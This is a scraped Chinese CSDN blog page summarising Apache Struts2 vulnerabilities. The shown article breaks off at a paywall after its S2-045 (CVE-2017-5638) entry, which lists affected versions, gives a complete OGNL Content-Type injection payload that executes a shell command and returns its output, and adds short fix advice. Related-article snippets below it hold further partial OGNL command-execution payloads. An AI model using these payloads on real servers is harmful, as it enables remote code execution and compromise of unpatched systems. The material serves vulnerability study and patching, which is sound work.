str2poc总结

最新推荐文章于 2023-09-25 17:25:31 发布
最新推荐文章于 2023-09-25 17:25:31 发布
阅读量371 收藏
点赞数
分类专栏: 安全学习 文章标签: struts2 java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38976030/article/details/105410574
版权
本文详细介绍了多个Struts2框架的安全漏洞,包括CVE-2017-5638、CVE-2017-979、CVE-2017-9805和CVE-2017-12611,涉及远程代码执行风险。针对每个漏洞,提供了测试POC和相应的修复建议,包括内容过滤、禁用危险插件和升级到最新版本。
摘要由CSDN通过智能技术生成

看了很多文章的str2的漏洞集合

#Struts2-045
CVE-2017-5638
影响范围:Struts 2.3.5 – Struts 2.3.31,Struts 2.5 – Struts 2.5.10
触发条件:基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行
利用方法:构造Content-type的值
测试POC:
%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

修复建议:

  1. 严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。
  2. 如果您使用基于Jakarta插件,请升级到最新版本。(强烈推荐)

#struts2-046
CVE-2017-5638
影响范围

最低0.47元/天 解锁文章
没太清醒
关注
专栏目录
GMSL2 POC电路官方推荐型号
07-30
GMSL2 POC电路官方推荐型号 GMSL2(Generic Media Serial Link 2)是一种高速串行链接技术,广泛应用于车联网、自动驾驶、医疗设备、工业自动化等领域。POC(Power over Coax)是GMSL2的一种实现技术,能够提供高速...
struts2/s2-046漏洞复现
weixin_44253823的博客
11-19 3141
漏洞环境采用vulhub下struts2/s2-046。 搭建好环境后访问youip:8080 点击Submit的同时打开burpsuite抓包工具。 发送到Repeater模块,在filename中插入下列POC代码。 %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('...
struts2漏洞
热门推荐
qq_52527336的博客
06-30 1万+
记一下笔记一个个写吧
【中间件】Struts2系列漏洞POC小结
weixin_30852367的博客
05-16 292
#Struts2-045 ''' CVE-2017-5638 影响范围:Struts 2.3.5 – Struts 2.3.31,Struts 2.5 – Struts 2.5.10 触发条件:基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行 利用方法:构造Content-type的值 测试POC: %{(#nike='multipart/form-...
java struts2 漏洞_Struts2漏洞利用
weixin_34837898的博客
02-13 758
Struts漏洞合集Struts-S2-013漏洞利用受影响版本Struts 2.0.0 - Struts 2.3.14.1漏洞利用任意命令执行POC:${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java...
第一届“龙信杯”电子数据取证竞赛Writeup
最新发布
toto的博客
09-25 7056
第一届“龙信杯”电子数据取证竞赛Writeup
S2-057-poc
08-23
Apache Struts2是一款广泛应用的开源Web应用程序框架,用于构建企业级JavaEE web应用。S2-057漏洞,也称为CVE-2018-11776,是Struts2框架中的一个严重安全漏洞,允许远程代码执行(RCE),可能导致攻击者能够完全...
2个chrome 0day poc
04-20
在本案例中,我们有两个这样的Chrome 0day poc,分别包含在exploit2.html、exploit.html和exploit.js文件中。 exploit2.html和exploit.html是两个可能利用Chrome浏览器漏洞的HTML文件。它们可能通过构造恶意的网页...
OAuth2PoC
03-22
OAuth2PoC是一个基于Java实现的OAuth 2.0 Proof of Concept(PoC)项目,旨在帮助开发者理解和实践OAuth 2.0协议的工作流程。OAuth 2.0是一种授权框架,广泛应用于各种Web应用程序和API服务,允许第三方应用在用户...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
04-26
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apach e.struts/struts2-spring-plugin/2.3.32
s2-045 java_S2-045、S2-046
weixin_42516104的博客
02-22 275
前言S2-045依然是一个Ognl表达式注入导致的RCE漏洞,且漏洞很严重。另外,还是建议读者阅读本篇文章前先看下系列文章的第一篇。正文依然是第一篇文章中讲过,StrutsPrepareFilter的doFilter方法中,在获取action mapper前会对HttpServletRequest做一次封装。跟进该方法内:可以看到在wrapRequest方法根据请求中的Content-Type的不...
Struts2漏洞复现合集
weixin_42345596的博客
07-11 3045
1. Struts2简介 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务
S2-045 远程代码执行漏洞(CVE-2017-5638)
Stephen Wolf
11-04 8965
一、S2-045 远程代码执行漏洞(CVE-2017-5638) 简述: Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大...
Struts2+Weblogic+ThinkPHP三大主流框架中间件历史漏洞(手工验证)
qq_44433172的博客
06-20 718
Struts2、Weblogic、ThinkPHP三大主流框架历史漏洞
nmap实现 自动发现web漏洞的思路
weixin_34362875的博客
05-31 731
2019独角兽企业重金招聘Python工程师标准>>> ...
Struts2-045远程代码执行漏洞复现
jiji_king的博客
07-05 637
个人笔记
struts2 s2-045漏洞检测 &临时解决方案
TUDP
03-08 7648
struts2 漏洞检测代码      (文件上传代码和 exce命令来均自网络 懒得自己写)      public static String upload(String url,String filePath){        String fdfsPath = "";        try {            DefaultHttpClient httpclient
S2-045远程代码执行漏洞
a1b2c3是弱口令
12-20 2500
Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 影响范围 Struts 2.3.5 – Struts 2.3.31 Struts ...
log4j2的poc
08-13
如果您对Log4j 2存在的漏洞(如CVE-2021-44228)或其相关问题感兴趣,建议您查阅官方安全公告和专业安全团队的建议,以了解如何保护您的系统并进行修复。确保在使用和测试任何安全工具或代码时,始终遵守法律法规,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值